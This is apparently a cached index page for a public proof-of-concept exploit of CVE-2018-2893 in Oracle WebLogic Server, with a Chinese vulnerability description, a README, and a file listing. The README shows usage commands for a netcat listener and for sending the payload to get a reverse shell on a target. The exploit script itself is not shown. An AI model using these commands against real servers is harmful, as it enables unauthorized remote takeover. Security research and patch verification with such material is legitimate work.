CVE-2018-2893 PoC — Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞

Source

https://github.com/qianl0ng/CVE-2018-2893

Associated Vulnerability

Title:Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞 (CVE-2018-2893)
Description:Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制Oracle WebLogic Server，影响

Description

可以直接反弹shell

Readme

**CVE-2018-2893**

> 可以直接反弹shell

**Usage**

监听

    nc -lvvp reverse_port

发送payload

    python weblogic.py target_host target_port reverse_host reverse_port

**Reffer**
[bigsizeme](https://github.com/bigsizeme/CVE-2018-2893)
[pyn3rd](https://github.com/pyn3rd/CVE-2018-2893)

**说明**

> 仅用于测试和交流学习，勿作他用

File Snapshot


 [4.0K]  /data/pocs/2c43e45258c82eaa613351a8ab13c489ee9fd8b8
├── [ 361]  README.md
├── [8.5K]  weblogic.py
└── [ 455]  未命名绘图.drawio

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!